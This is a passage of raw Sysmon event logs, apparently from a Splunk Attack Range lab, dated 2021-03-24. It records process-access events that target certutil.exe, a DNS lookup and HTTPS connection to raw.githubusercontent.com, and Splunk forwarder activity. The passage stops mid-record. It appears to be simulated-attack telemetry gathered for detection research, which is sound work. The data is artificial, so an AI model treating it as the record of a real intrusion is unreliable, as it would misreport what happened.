AUTHORITY\SYSTEM{BFB545BB-B865-6058-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000005917697Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:56.234{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7619D7C48603AAAB32183AAB93E8EF36,SHA256=256F732D7B5A9BA03275A5DDE7DA843259568A41EEEB566F6114783633EACD99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917696Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:56.205{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4A4A190A040739755331CC22E5EF53BB,SHA256=081E4018C1406924A504A49C0F1B030CD5007284A895A589BEBDDE9133B749CD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000005917695Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:52.859{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1505-false10.0.1.12-8000- 23542300x8000000000000000638521Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:57.757{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F4CA7FB6C0762507CB6F2696AE82E84,SHA256=D0E71F453087F56474F8B9E268264E8B2CAA9B2E2128CB9CDC1AC31B0DA09833,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917705Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:57.731{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917704Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:57.731{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000005917703Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:53.974{00000000-0000-0000-0000-000000000000}6800raw.githubusercontent.com0::ffff:185.199.111.133;::ffff:185.199.108.133;::ffff:185.199.110.133;::ffff:185.199.109.133;<unknown process> 23542300x80000000000000005917702Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:57.310{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=509F4059B4EF55AB6BE7D8A296634757,SHA256=61FE83DA89580D1EC8447AC602CE9AFEE43A0805F1889E5E2CDF23DD009EE05A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000005917701Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:53.969{00000000-0000-0000-0000-000000000000}6800<unknown process>-tcptruefalse10.0.1.14win-dc-792.attackrange.local1506-false185.199.111.133cdn-185-199-111-133.github.com443https 23542300x8000000000000000638522Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:58.773{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2CC9FD378B3730279E5841975E9BAC2,SHA256=35E89753BFD6C7E40B72837125238561A131121C391F0E962CB788FD373130D8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917708Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:58.731{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917707Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:58.731{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917706Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:58.313{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FA3119AF2B9DD31EC8C4B26C2DCCF45,SHA256=C21F8E22DD82EB5C4DE3633AB98AE83E1AB980112DC2EAC423ACA40E7209A32B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917738Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:59.989{896A638B-B5CB-6058-1600-00000000AE01}13085440C:\Windows\System32\svchost.exe{896A638B-B407-605B-8369-00000000AE01}1220C:\Windows\System32\certutil.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917737Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:59.989{896A638B-B5CB-6058-1600-00000000AE01}13081328C:\Windows\System32\svchost.exe{896A638B-B407-605B-8369-00000000AE01}1220C:\Windows\System32\certutil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917736Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:59.968{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B407-605B-8369-00000000AE01}1220C:\Windows\System32\certutil.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917735Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:59.968{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B407-605B-8369-00000000AE01}1220C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917734Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:59.967{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B407-605B-8369-00000000AE01}1220C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917733Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:59.966{896A638B-B8E1-6058-A802-00000000AE01}30922100C:\Windows\System32\taskhostw.exe{896A638B-B407-605B-8469-00000000AE01}7868C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917732Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:59.965{896A638B-B8E1-6058-A802-00000000AE01}30922100C:\Windows\System32\taskhostw.exe{896A638B-B407-605B-8469-00000000AE01}7868C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917731Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:59.961{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B407-605B-8369-00000000AE01}1220C:\Windows\System32\certutil.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917730Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:59.960{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B407-605B-8369-00000000AE01}1220C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917729Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:59.960{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B407-605B-8369-00000000AE01}1220C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917728Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:59.960{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B407-605B-8369-00000000AE01}1220C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917727Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:59.959{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B407-605B-8469-00000000AE01}7868C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917726Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:59.959{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B407-605B-8469-00000000AE01}7868C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917725Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:59.959{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B407-605B-8469-00000000AE01}7868C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917724Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:59.959{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B407-605B-8469-00000000AE01}7868C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917723Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:59.950{896A638B-B5CB-6058-1600-00000000AE01}13085440C:\Windows\System32\svchost.exe{896A638B-B407-605B-8469-00000000AE01}7868C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917722Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:59.950{896A638B-B5CB-6058-1600-00000000AE01}13081328C:\Windows\System32\svchost.exe{896A638B-B407-605B-8469-00000000AE01}7868C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917721Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:59.946{896A638B-B407-605B-8469-00000000AE01}78682624C:\Windows\system32\conhost.exe{896A638B-B407-605B-8369-00000000AE01}1220C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917720Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:59.939{896A638B-B8DD-6058-9202-00000000AE01}36324724C:\Windows\system32\csrss.exe{896A638B-B407-605B-8469-00000000AE01}7868C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917719Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:59.936{896A638B-B8DD-6058-9202-00000000AE01}36325864C:\Windows\system32\csrss.exe{896A638B-B407-605B-8369-00000000AE01}1220C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917718Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:59.934{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917717Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:59.934{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917716Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:59.934{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917715Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:59.934{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917714Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:59.933{896A638B-B5C8-6058-0500-00000000AE01}396412C:\Windows\system32\csrss.exe{896A638B-B407-605B-8369-00000000AE01}1220C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917713Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 